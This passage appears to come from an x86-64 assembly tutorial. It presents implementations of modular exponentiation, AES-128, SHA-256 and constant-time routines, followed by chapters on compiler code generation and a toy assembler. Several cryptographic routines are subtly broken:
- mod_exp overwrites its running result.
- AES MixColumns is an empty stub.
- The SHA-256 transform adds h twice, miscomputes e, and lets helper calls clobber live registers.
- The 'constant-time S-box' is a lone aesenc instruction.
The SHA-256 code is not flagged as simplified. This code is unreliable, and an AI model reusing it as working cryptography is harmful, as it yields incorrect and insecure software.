        carry = (result->words[i] < carry) ? 1 : 0;
    }
    
    bigint_free(a_low); bigint_free(a_high);
    bigint_free(b_low); bigint_free(b_high);
    bigint_free(a_sum); bigint_free(b_sum);
    bigint_free(z0); bigint_free(z1); bigint_free(z2);
    
    return result;
}

Modular Exponentiation

; mod_exp.asm - Modular exponentiation (RSA-style)
; RDI = base, RSI = exponent, RDX = modulus
; Returns: (base^exponent) % modulus
global mod_exp

mod_exp:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    push r13
    push r14
    
    mov rax, 1          ; result = 1
    mov rbx, rdi        ; base
    mov rcx, rsi        ; exponent
    mov r12, rdx        ; modulus
    
.exp_loop:
    test rcx, 1         ; check LSB of exponent
    jz .skip_mul
    
    ; result = (result * base) % modulus
    mul rbx
    div r12
    mov rax, rdx        ; remainder becomes new result
    
.skip_mul:
    ; base = (base * base) % modulus
    mov rax, rbx
    mul rbx
    div r12
    mov rbx, rdx
    
    ; exponent >>= 1
    shr rcx, 1
    jnz .exp_loop
    
    pop r14
    pop r13
    pop r12
    pop rbx
    pop rbp
    ret

Chapter 30: Implementing AES in Assembly

AES Round Structure

; aes.asm - AES-128 implementation
section .data
    ; AES S-box
    sbox:
    db 0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76
    db 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0
    db 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15
    db 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75
    db 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84
    db 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf
    db 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8
    db 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2
    db 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73
    db 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb
    db 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79
    db 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08
    db 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a
    db 0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e
    db 0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf
    db 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16
    
    ; Round constants
    rcon:
    db 0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36

section .text
global aes_encrypt_block

; AES-128 encrypt one block
; RDI = input block (16 bytes)
; RSI = output block (16 bytes)
; RDX = round keys (176 bytes)
aes_encrypt_block:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    push r13
    push r14
    push r15
    
    ; Copy input to state (XMM0)
    movdqu xmm0, [rdi]
    
    ; Initial AddRoundKey
    movdqu xmm1, [rdx]
    pxor xmm0, xmm1
    
    ; 9 main rounds
    mov rcx, 9
    mov rbx, rdx
    add rbx, 16         ; point to round key 1
    
.round_loop:
    ; SubBytes - using lookup table
    call sub_bytes
    
    ; ShiftRows
    call shift_rows
    
    ; MixColumns
    call mix_columns
    
    ; AddRoundKey
    movdqu xmm1, [rbx]
    pxor xmm0, xmm1
    
    add rbx, 16         ; next round key
    dec rcx
    jnz .round_loop
    
    ; Final round (no MixColumns)
    call sub_bytes
    call shift_rows
    
    ; Final AddRoundKey
    movdqu xmm1, [rbx]
    pxor xmm0, xmm1
    
    ; Store result
    movdqu [rsi], xmm0
    
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    pop rbp
    ret

; SubBytes transformation
sub_bytes:
    push rbp
    mov rbp, rsp
    
    ; Process each byte using S-box
    ; This is a simplified version - real implementation would use
    ; vectorized lookups or Galois field arithmetic
    
    ; For demonstration, using scalar code
    movdqa [rsp-16], xmm0    ; save on stack
    
    xor rcx, rcx
.loop:
    movzx rax, byte [rsp-16 + rcx]
    mov al, [sbox + rax]
    mov [rsp-16 + rcx], al
    inc rcx
    cmp rcx, 16
    jl .loop
    
    movdqa xmm0, [rsp-16]
    
    pop rbp
    ret

; ShiftRows transformation
shift_rows:
    ; AES shift rows:
    ; Row 0: no shift
    ; Row 1: shift left 1
    ; Row 2: shift left 2
    ; Row 3: shift left 3
    
    ; Using byte shuffling
    ; This is a simplified version
    pshufb xmm0, [shift_row_mask]
    ret

shift_row_mask:
    db 0x00, 0x05, 0x0a, 0x0f   ; row 0
    db 0x04, 0x09, 0x0e, 0x03   ; row 1
    db 0x08, 0x0d, 0x02, 0x07   ; row 2
    db 0x0c, 0x01, 0x06, 0x0b   ; row 3

; MixColumns transformation
mix_columns:
    ; MixColumns multiplies each column by fixed matrix
    ; Using xtime operations
    
    push rbp
    mov rbp, rsp
    sub rsp, 16
    
    movdqa [rsp], xmm0
    
    ; Process each column
    xor rcx, rcx
.col_loop:
    ; Load column bytes
    movzx eax, byte [rsp + rcx*4]
    movzx ebx, byte [rsp + rcx*4 + 1]
    movzx edx, byte [rsp + rcx*4 + 2]
    movzx esi, byte [rsp + rcx*4 + 3]
    
    ; xtime function (multiply by 2 in GF(2^8))
    ; This is simplified - real implementation uses lookup tables
    
    ; Store back column
    ; (simplified - real MixColumns uses matrix multiplication)
    
    inc rcx
    cmp rcx, 4
    jl .col_loop
    
    movdqa xmm0, [rsp]
    add rsp, 16
    pop rbp
    ret

Key Expansion

; AES-128 Key Expansion
; RDI = key (16 bytes)
; RSI = round keys buffer (176 bytes)
global aes_key_expansion

aes_key_expansion:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    
    ; Copy original key to first 16 bytes
    mov rcx, 4
    xor rbx, rbx
.copy_key:
    mov eax, [rdi + rbx*4]
    mov [rsi + rbx*4], eax
    inc rbx
    loop .copy_key
    
    ; Generate remaining round keys
    mov rcx, 10         ; 10 rounds
    mov rbx, 4          ; word index
    
.key_exp_loop:
    ; Get previous word
    mov eax, [rsi + (rbx-1)*4]
    
    ; RotWord
    rol eax, 8
    
    ; SubWord
    call sub_word
    
    ; XOR with Rcon
    movzx r12, byte [rcon + rcx-1]
    xor al, r12l
    
    ; XOR with word from 4 positions back
    xor eax, [rsi + (rbx-4)*4]
    
    ; Store
    mov [rsi + rbx*4], eax
    inc rbx
    
    ; Generate remaining 3 words of this round
    mov r8, 3
.gen_word:
    mov eax, [rsi + (rbx-1)*4]
    xor eax, [rsi + (rbx-4)*4]
    mov [rsi + rbx*4], eax
    inc rbx
    dec r8
    jnz .gen_word
    
    loop .key_exp_loop
    
    pop r12
    pop rbx
    pop rbp
    ret

; Substitute each byte of EAX using S-box
sub_word:
    push rbx
    
    mov bl, al
    mov al, [sbox + rbx]
    shr eax, 8
    mov bl, al
    mov al, [sbox + rbx]
    shl eax, 8
    shr eax, 8
    
    pop rbx
    ret

Chapter 31: SHA Implementation

SHA-256 Constants

; sha256.asm - SHA-256 implementation
section .data
    ; SHA-256 initial hash values
    h0 dd 0x6a09e667
    h1 dd 0xbb67ae85
    h2 dd 0x3c6ef372
    h3 dd 0xa54ff53a
    h4 dd 0x510e527f
    h5 dd 0x9b05688c
    h6 dd 0x1f83d9ab
    h7 dd 0x5be0cd19
    
    ; SHA-256 round constants
    k:
    dd 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5
    dd 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5
    dd 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3
    dd 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174
    dd 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc
    dd 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da
    dd 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7
    dd 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967
    dd 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13
    dd 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85
    dd 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3
    dd 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070
    dd 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5
    dd 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3
    dd 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208
    dd 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2

section .text
global sha256_transform

; SHA-256 transform function
; RDI = state (8 dwords)
; RSI = block (64 bytes)
sha256_transform:
    push rbp
    mov rbp, rsp
    sub rsp, 64         ; allocate w[0..15] on stack
    push rbx
    push r12
    push r13
    push r14
    push r15
    
    ; Initialize working variables a-h
    mov eax, [rdi]      ; a
    mov ebx, [rdi+4]    ; b
    mov ecx, [rdi+8]    ; c
    mov edx, [rdi+12]   ; d
    mov r8d, [rdi+16]   ; e
    mov r9d, [rdi+20]   ; f
    mov r10d, [rdi+24]  ; g
    mov r11d, [rdi+28]  ; h
    
    ; Copy block to w[0..15] (big-endian to host)
    xor r12, r12
.prep_loop:
    mov r13d, [rsi + r12*4]
    bswap r13d           ; convert from big-endian
    mov [rsp + r12*4], r13d
    inc r12
    cmp r12, 16
    jl .prep_loop
    
    ; Main loop: for t = 0 to 63
    xor r12, r12         ; t = 0
.main_loop:
    ; Prepare message schedule for t >= 16
    cmp r12, 16
    jl .skip_schedule
    
    ; w[t] = sigma1(w[t-2]) + w[t-7] + sigma0(w[t-15]) + w[t-16]
    mov r13d, [rsp + (r12-2)*4]
    call sigma1
    mov r14d, eax
    
    mov eax, [rsp + (r12-7)*4]
    add r14d, eax
    
    mov eax, [rsp + (r12-15)*4]
    call sigma0
    add r14d, eax
    
    add r14d, [rsp + (r12-16)*4]
    
    mov [rsp + r12*4], r14d
    
.skip_schedule:
    ; T1 = h + Sigma1(e) + Ch(e,f,g) + k[t] + w[t]
    mov eax, r8d
    call Sigma1
    add eax, r11d        ; + h
    add eax, r11d        ; (h already in r11)
    
    ; Ch(e,f,g) = (e & f) ^ (~e & g)
    mov r13d, r8d
    and r13d, r9d
    mov r14d, r8d
    not r14d
    and r14d, r10d
    xor r13d, r14d
    add eax, r13d
    
    add eax, [k + r12*4] ; + k[t]
    add eax, [rsp + r12*4] ; + w[t]
    mov r13d, eax        ; T1 in r13d
    
    ; T2 = Sigma0(a) + Maj(a,b,c)
    mov eax, eax
    call Sigma0
    mov r14d, eax
    
    ; Maj(a,b,c) = (a & b) ^ (a & c) ^ (b & c)
    mov eax, eax
    and eax, ebx
    mov r15d, eax
    mov eax, eax
    and eax, ecx
    xor r15d, eax
    mov eax, ebx
    and eax, ecx
    xor r15d, eax
    add r14d, r15d       ; T2
    
    ; Update registers
    mov r11d, r10d       ; h = g
    mov r10d, r9d        ; g = f
    mov r9d, r8d         ; f = e
    add r8d, r13d        ; e = d + T1
    mov r8d, edx
    add r8d, r13d
    mov edx, ecx         ; d = c
    mov ecx, ebx         ; c = b
    mov ebx, eax         ; b = a
    mov eax, r13d
    add eax, r14d        ; a = T1 + T2
    
    inc r12
    cmp r12, 64
    jl .main_loop
    
    ; Add results to state
    add [rdi], eax
    add [rdi+4], ebx
    add [rdi+8], ecx
    add [rdi+12], edx
    add [rdi+16], r8d
    add [rdi+20], r9d
    add [rdi+24], r10d
    add [rdi+28], r11d
    
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    mov rsp, rbp
    pop rbp
    ret

; Sigma0 function (for 32-bit values)
Sigma0:
    mov r13d, eax
    ror eax, 2
    ror r13d, 13
    xor eax, r13d
    ror r13d, 22
    xor eax, r13d
    ret

; Sigma1 function (for 32-bit values)
Sigma1:
    mov r13d, eax
    ror eax, 6
    ror r13d, 11
    xor eax, r13d
    ror r13d, 25
    xor eax, r13d
    ret

; sigma0 function (for message schedule)
sigma0:
    mov r13d, eax
    ror eax, 7
    ror r13d, 18
    xor eax, r13d
    shr eax, 3
    xor eax, r13d
    ret

; sigma1 function (for message schedule)
sigma1:
    mov r13d, eax
    ror eax, 17
    ror r13d, 19
    xor eax, r13d
    shr eax, 10
    xor eax, r13d
    ret

Chapter 32: Constant-Time Programming

Why Constant-Time?

Cryptographic code must avoid timing side-channels.

Vulnerable Code

// Timing leaks! Different paths take different time
int check_password(const char *user, const char *expected) {
    for (int i = 0; i < len; i++) {
        if (user[i] != expected[i]) {
            return 0;  // Early exit leaks information
        }
    }
    return 1;
}

Constant-Time Comparison

; constant_time_cmp.asm - Compare without early exit
; RDI = buffer1, RSI = buffer2, RDX = length
; Returns 0 if equal, non-zero if different
global constant_time_cmp

constant_time_cmp:
    push rbp
    mov rbp, rsp
    
    xor rax, rax        ; result = 0
    xor rcx, rcx        ; counter
    
.loop:
    ; Load bytes
    movzx r8, byte [rdi + rcx]
    movzx r9, byte [rsi + rcx]
    
    ; XOR and OR into result
    xor r8, r9
    or rax, r8
    
    inc rcx
    cmp rcx, rdx
    jl .loop
    
    ; Return (0 if all bytes equal)
    pop rbp
    ret

Constant-Time Select

; constant_time_select.asm - Choose between two values without branching
; RDI = condition (0 or 1), RSI = val_if_true, RDX = val_if_false
; Returns selected value
global constant_time_select

constant_time_select:
    ; Create mask: if condition, mask = 0xFFFFFFFFFFFFFFFF
    neg rdi
    sbb rdi, rdi
    
    ; (mask & val_if_true) | (~mask & val_if_false)
    mov rax, rdi
    and rax, rsi
    not rdi
    and rdi, rdx
    or rax, rdi
    ret

Constant-Time AES S-box

; constant_time_sbox.asm - S-box lookup without cache timing leaks
; Using bit-sliced implementation or vector permutations

; Example: bit-sliced AES S-box (simplified)
; This implementation avoids table lookups
bit_sliced_sbox:
    ; Convert byte to bits in separate registers
    ; Compute S-box using Boolean expressions
    ; This is constant-time but complex
    
    ; Simplified version using SSE shuffles
    ; (still may leak through cache)
    
    ; Better: use AES-NI instructions
    aesenc xmm0, xmm1    ; hardware AES is constant-time
    ret

PART XII — Compiler & Code Generation

Chapter 33: How Compilers Generate Assembly

Compilation Pipeline

Source Code (C/C++)
    ↓
Lexical Analysis (tokenization)
    ↓
Parsing (AST construction)
    ↓
Semantic Analysis
    ↓
Intermediate Representation (IR)
    ↓
Optimization
    ↓
Code Generation
    ↓
Assembly
    ↓
Object Code

Example: Simple Expression

// Original C
int add(int a, int b) {
    return a + b;
}

Compiler-Generated Assembly (unoptimized)

add:
    push rbp
    mov rbp, rsp
    mov DWORD PTR [rbp-4], edi
    mov DWORD PTR [rbp-8], esi
    mov edx, DWORD PTR [rbp-4]
    mov eax, DWORD PTR [rbp-8]
    add eax, edx
    pop rbp
    ret

Optimized (-O2)

add:
    lea eax, [rdi+rsi]
    ret

Control Flow

// Original C
int max(int a, int b) {
    if (a > b) return a;
    return b;
}

Generated Assembly

max:
    cmp edi, esi
    mov eax, esi
    cmovg eax, edi      ; conditional move
    ret

Loop Optimization

// Original C
int sum_array(int *arr, int n) {
    int total = 0;
    for (int i = 0; i < n; i++) {
        total += arr[i];
    }
    return total;
}

Vectorized Assembly

sum_array:
    test esi, esi
    jle .L3
    xor eax, eax
    xor ecx, ecx
.L2:
    add eax, [rdi+rcx*4]
    inc rcx
    cmp ecx, esi
    jl .L2
    ret
.L3:
    xor eax, eax
    ret

With AVX Vectorization

sum_array_avx:
    test esi, esi
    jle .L3
    xor eax, eax
    vpxor xmm0, xmm0, xmm0
    xor ecx, ecx
.L2:
    vmovdqu xmm1, [rdi+rcx*4]
    vpaddd xmm0, xmm0, xmm1
    add ecx, 4
    cmp ecx, esi
    jl .L2
    
    ; Horizontal sum
    vextracti128 xmm1, ymm0, 1
    vpaddd xmm0, xmm0, xmm1
    vpsrldq xmm1, xmm0, 8
    vpaddd xmm0, xmm0, xmm1
    vpsrldq xmm1, xmm0, 4
    vpaddd xmm0, xmm0, xmm1
    vmovd eax, xmm0
    ret
.L3:
    xor eax, eax
    ret

Chapter 34: Intermediate Representations

Three-Address Code

t1 = a + b
t2 = t1 * c
d = t2 - e

Static Single Assignment (SSA)

a1 = 5
b1 = a1 + 3
c1 = b1 * 2
if (c1 > 10)
    a2 = c1 + 1
else
    a3 = c1 - 1
a4 = φ(a2, a3)

LLVM IR Example

; LLVM IR for simple function
define i32 @add(i32 %a, i32 %b) {
entry:
  %sum = add i32 %a, %b
  ret i32 %sum
}

; With control flow
define i32 @max(i32 %a, i32 %b) {
entry:
  %cmp = icmp sgt i32 %a, %b
  br i1 %cmp, label %then, label %else

then:
  br label %merge

else:
  br label %merge

merge:
  %result = phi i32 [ %a, %then ], [ %b, %else ]
  ret i32 %result
}

Chapter 35: Writing a Simple Assembler

Assembler Structure

// assembler.c - Simple two-pass assembler
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define MAX_LINE 256
#define MAX_SYMBOLS 1024
#define MAX_CODE 65536

typedef struct {
    char name[64];
    uint32_t address;
    int defined;
} symbol_t;

typedef struct {
    char mnemonic[16];
    uint8_t opcode;
    int has_imm;
} instruction_t;

// Instruction table
instruction_t inst_table[] = {
    {"nop", 0x90, 0},
    {"mov", 0xB8, 1},  // mov reg, imm (simplified)
    {"add", 0x01, 0},
    {"sub", 0x29, 0},
    {"jmp", 0xE9, 1},
    {"ret", 0xC3, 0},
    {"int", 0xCD, 1},
    {NULL, 0, 0}
};

// Symbol table
symbol_t symbols[MAX_SYMBOLS];
int symbol_count = 0;

// Generated code
uint8_t code[MAX_CODE];
uint32_t code_ptr = 0;

// Add symbol
int add_symbol(char *name, uint32_t addr) {
    for (int i = 0; i < symbol_count; i++) {
        if (strcmp(symbols[i].name, name) == 0) {
            symbols[i].address = addr;
            symbols[i].defined = 1;
            return i;
        }
    }
    
    strcpy(symbols[symbol_count].name, name);
    symbols[symbol_count].address = addr;
    symbols[symbol_count].defined = 1;
    return symbol_count++;
}

// Find symbol
int find_symbol(char *name) {
    for (int i = 0; i < symbol_count; i++) {
        if (strcmp(symbols[i].name, name) == 0) {
            return i;
        }
    }
    return -1;
}

// Parse instruction
int parse_instruction(char *line, uint32_t addr) {
    char mnemonic[16];
    char operand[64];
    int n = sscanf(line, "%s %s", mnemonic, operand);
    
    // Find instruction
    instruction_t *inst = NULL;
    for (int i = 0; inst_table[i].mnemonic != NULL; i++) {
        if (strcmp(mnemonic, inst_table[i].mnemonic) == 0) {
            inst = &inst_table[i];
            break;
        }
    }
    
    if (!inst) return -1;
    
    // First pass: just track labels
    if (n == 1) {
        code[code_ptr++] = inst->opcode;
        if (inst->has_imm) {
            // Placeholder for relocation
            code[code_ptr++] = 0;
            code[code_ptr++] = 0;
            code[code_ptr++] = 0;
            code[code_ptr++] = 0;
        }
    } else {
        // Check if operand is a label
        if (operand[0] == '_' || operand[0] == '.' || 
            (operand[0] >= 'a' && operand[0] <= 'z')) {
            // Label reference - add to symbol table if not defined
            if (find_symbol(operand) == -1) {
                add_symbol(operand, 0);  // undefined for now
            }
        }
    }
    
    return 0;
}

// First pass - collect labels
void first_pass(FILE *in) {
    char line[MAX_LINE];
    uint32_t addr = 0;
    
    while (fgets(line, sizeof(line), in)) {
        // Remove newline
        line[strcspn(line, "\n")] = 0;
        
        // Skip empty lines
        if (line[0] == '\0') continue;
        
        // Check for label
        if (line[strlen(line)-1] == ':') {
            line[strlen(line)-1] = 0;  // Remove colon
            add_symbol(line, addr);
            continue;
        }
        
        // Parse instruction (first pass - just for size)
        parse_instruction(line, addr);
    }
    
    rewind(in);
}

// Second pass - generate code
void second_pass(FILE *in) {
    char line[MAX_LINE];
    code_ptr = 0;
    
    while (fgets(line, sizeof(line), in)) {
        line[strcspn(line, "\n")] = 0;
        if (line[0] == '\0') continue;
        
        // Skip labels
        if (line[strlen(line)-1] == ':') continue;
        
        char mnemonic[16];
        char operand[64];
        int n = sscanf(line, "%s %s", mnemonic, operand);
        
        // Find instruction
        instruction_t *inst = NULL;
        for (int i = 0; inst_table[i].mnemonic != NULL; i++) {
            if (strcmp(mnemonic, inst_table[i].mnemonic) == 0) {
                inst = &inst_table[i];
                break;
            }
        }
        
        if (!inst) continue;
        
        // Emit opcode
        code[code_ptr++] = inst->opcode;
        
        // Emit operand
        if (inst->has_imm) {
            if (n > 1) {
                // Check if numeric or label
                char *endptr;
                long val = strtol(operand, &endptr, 0);
                if (*endptr == '\0') {
                    // Numeric constant
                    *(uint32_t*)(code + code_ptr) = (uint32_t)val;
                } else {
                    // Label reference
                    int sym_idx = find_symbol(operand);
                    if (sym_idx >= 0) {
                        // Calculate relative address for jumps
                        if (inst->opcode == 0xE9) {  // jmp
                            int32_t rel = symbols[sym_idx].address - 
                                        (code_ptr + 4);
                            *(int32_t*)(code + code_ptr) = rel;
                        } else {
                            *(uint32_t*)(code + code_ptr) = 
                                symbols[sym_idx].address;
                        }
                    }
                }
            }
            code_ptr += 4;
        }
    }
}

// Main assembler
int main(int argc, char **argv) {
    if (argc < 2) {
        printf("Usage: %s input.asm\n", argv[0]);
        return 1;
    }
    
    FILE *in = fopen(argv[1], "r");
    if (!in) {
        perror("fopen");
        return 1;
    }
    
    // Two-pass assembly
    first_pass(in);
    second_pass(in);
    
    fclose(in);
    
    // Output binary
    char outname[256];
    snprintf(outname, sizeof(outname), "%s.bin", argv[1]);
    
    FILE *out = fopen(outname, "wb");
    fwrite(code, 1, code_ptr, out);
    fclose(out);
    
    printf("Assembled %u bytes to %s\n", code_ptr, outname);
    
    return 0;
}

Chapter 36: Writing a Simple Compiler Backend

Abstract Syntax Tree

// ast.h - Abstract Syntax Tree
typedef enum {
    NODE_INT,
    NODE_VAR,
    NODE_ADD,
    NODE_SUB,
    NODE_MUL,
    NODE_DIV,
    NODE_ASSIGN,
    NODE_IF,
    NODE_WHILE,
    NODE_RETURN,
    NODE_BLOCK
} node_type_t;

typedef struct ast_node {
    node_type_t type;
    union {
        int int_value;
        char *var_name;
        struct {
            struct ast_node *left;
            struct ast_node *right;
        } binary;
        struct {
            struct ast_node *cond;
            struct ast_node *then;
            struct ast_node *els;
        } if_stmt;
        struct {
            struct ast_node *cond;
            struct ast_node *body;
        } while_stmt;
        struct {
            struct ast_node *expr;
        } return_stmt;
        struct {
            struct ast_node **stmts;
            int count;
        } block;
    } data;
} ast_node_t;

Code Generation

// codegen.c - x86-64 code generator
#include "ast.h"
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    FILE *out;
    int label_counter;
} codegen_t;

// Generate new label
char* new_label(codegen_t *cg) {
    static char buf[32];
    snprintf(buf, sizeof(buf), ".L%d", cg->label_counter++);
    return buf;
}

// Generate code for expression (result in EAX)
void gen_expr(codegen_t *cg, ast_node_t *node) {
    switch (node->type) {
        case NODE_INT:
            fprintf(cg->out, "    mov eax, %d\n", node->data.int_value);
            break;
            
        case NODE_VAR:
            fprintf(cg->out, "    mov eax, [rbp-%d]\n", 
                    find_var(node->data.var_name) * 4);
            break;
            
        case NODE_ADD:
            gen_expr(cg, node->data.binary.left);
            fprintf(cg->out, "    push rax\n");
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    pop rcx\n");
            fprintf(cg->out, "    add eax, ecx\n");
            break;
            
        case NODE_SUB:
            gen_expr(cg, node->data.binary.left);
            fprintf(cg->out, "    push rax\n");
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    mov ecx, eax\n");
            fprintf(cg->out, "    pop rax\n");
            fprintf(cg->out, "    sub eax, ecx\n");
            break;
            
        case NODE_MUL:
            gen_expr(cg, node->data.binary.left);
            fprintf(cg->out, "    push rax\n");
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    pop rcx\n");
            fprintf(cg->out, "    imul eax, ecx\n");
            break;
            
        default:
            break;
    }
}

// Generate code for statement
void gen_stmt(codegen_t *cg, ast_node_t *node) {
    switch (node->type) {
        case NODE_ASSIGN:
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    mov [rbp-%d], eax\n",
                    find_var(node->data.binary.left->data.var_name) * 4);
            break;
            
        case NODE_IF: {
            char *label_else = new_label(cg);
            char *label_end = new_label(cg);
            
            // Generate condition
            gen_expr(cg, node->data.if_stmt.cond);
            fprintf(cg->out, "    cmp eax, 0\n");
            fprintf(cg->out, "    je %s\n", label_else);
            
            // Then part
            gen_stmt(cg, node->data.if_stmt.then);
            fprintf(cg->out, "    jmp %s\n", label_end);
            
            // Else part
            fprintf(cg->out, "%s:\n", label_else);
            if (node->data.if_stmt.els) {
                gen_stmt(cg, node->data.if_stmt.els);
            }
            
            fprintf(cg->out, "%s:\n", label_end);
            break;
        }
        
        case NODE_WHILE: {
            char *label_start = new_label(cg);
            char *label_end = new_label(cg);
            
            fprintf(cg->out, "%s:\n", label_start);
            
            // Generate condition
            gen_expr(cg, node->data.while_stmt.cond);
            fprintf(cg->out, "    cmp eax, 0\n");
            fprintf(cg->out, "    je %s\n", label_end);
            
            // Loop body
            gen_stmt(cg, node->data.while_stmt.body);
            fprintf(cg->out, "    jmp %s\n", label_start);
            
            fprintf(cg->out, "%s:\n", label_end);
            break;
        }
        
        case NODE_RETURN:
            gen_expr(cg, node->data.return_stmt.expr);
            fprintf(cg->out, "    jmp .return\n");
            break;
            
        case NODE_BLOCK:
            for (int i = 0; i < node->data.block.count; i++) {
                gen_stmt(cg, node->data.block.stmts[i]);
            }
            break;
            
        default:
            break;
    }
}

// Generate function prologue
void gen_prologue(codegen_t *cg, int stack_size) {
    fprintf(cg->out, "    push rbp\n");
    fprintf(cg->out, "    mov rbp, rsp\n");
    fprintf(cg->out, "    sub rsp, %d\n", stack_size);
}

// Generate function epilogue
void gen_epilogue(codegen_t *cg) {
    fprintf(cg->out, ".return:\n");
    fprintf(cg->out, "    mov rsp, rbp\n");
    fprintf(cg->out, "    pop rbp\n");
    fprintf(cg->out, "    ret\n");
}

// Generate complete function
void gen_function(codegen_t *cg, ast_node_t *func) {
    // Calculate stack size for local variables
    int stack_size = count_locals(func) * 4;
    
    fprintf(cg->out, "global %s\n", func->data.var_name);
    fprintf(cg->out, "%s:\n", func->data.var_name);
    
    gen_prologue(cg, stack_size);
    gen_stmt(cg, func->data.block);
    gen_epilogue(cg);
    
    fprintf(cg->out, "\n");
}

// Generate entire program
void generate_program(codegen_t *cg, ast_node_t *program) {
    fprintf(cg->out, "; Generated by simple compiler\n");
    fprintf(cg->out, "section .text\n\n");
    
    for (int i = 0; i < program->data.block.count; i++) {
        gen_function(cg, program->data.block.stmts[i]);
    }
}

// Example usage
int main() {
    codegen_t cg = {stdout, 0};
    
    // Example AST for: int main() { return 42; }
    ast_node_t *program = create_block(
        create_function("main",
            create_block(
                create_return(
                    create_int(42)
                )
            )
        )
    );
    
    generate_program(&cg, program);
    
    return 0;
}

Appendices

Appendix A: Complete x86-64 Instruction Reference

Data Movement

Instruction	Description	Example
MOV	Move	`mov rax, rbx`
MOVZX	Move with zero-extend	`movzx eax, bl`
MOVSX	Move with sign-extend	`movsx rax, bx`
MOVSXD	Move with sign-extend (32->64)	`movsxd rax, ebx`
XCHG	Exchange	`xchg rax, rbx`
PUSH	Push onto stack	`push rax`
POP	Pop from stack	`pop rax`
LEA	Load effective address	`lea rax, [rbx+rcx*4]`

Arithmetic

Instruction	Description	Example
ADD	Add	`add rax, rbx`
ADC	Add with carry	`adc rax, rbx`
SUB	Subtract	`sub rax, rbx`
SBB	Subtract with borrow	`sbb rax, rbx`
MUL	Unsigned multiply	`mul rbx`
IMUL	Signed multiply	`imul rax, rbx`
DIV	Unsigned divide	`div rbx`
IDIV	Signed divide	`idiv rbx`
INC	Increment	`inc rax`
DEC	Decrement	`dec rax`
NEG	Negate	`neg rax`
CMP	Compare	`cmp rax, rbx`

Logical

Instruction	Description	Example
AND	Logical AND	`and rax, rbx`
OR	Logical OR	`or rax, rbx`
XOR	Exclusive OR	`xor rax, rax`
NOT	Complement	`not rax`
TEST	Test (AND without store)	`test rax, rax`

Shift/Rotate

Instruction	Description	Example
SHL	Shift left	`shl rax, cl`
SHR	Shift right	`shr rax, cl`
SAL	Arithmetic shift left	`sal rax, cl`
SAR	Arithmetic shift right	`sar rax, cl`
ROL	Rotate left	`rol rax, cl`
ROR	Rotate right	`ror rax, cl`
RCL	Rotate through carry left	`rcl rax, cl`
RCR	Rotate through carry right	`rcr rax, cl`

Control Transfer

Instruction	Description	Example
JMP	Unconditional jump	`jmp label`
JE/JZ	Jump if equal/zero	`je label`
JNE/JNZ	Jump if not equal	`jne label`
JG	Jump if greater (signed)	`jg label`
JL	Jump if less (signed)	`jl label`
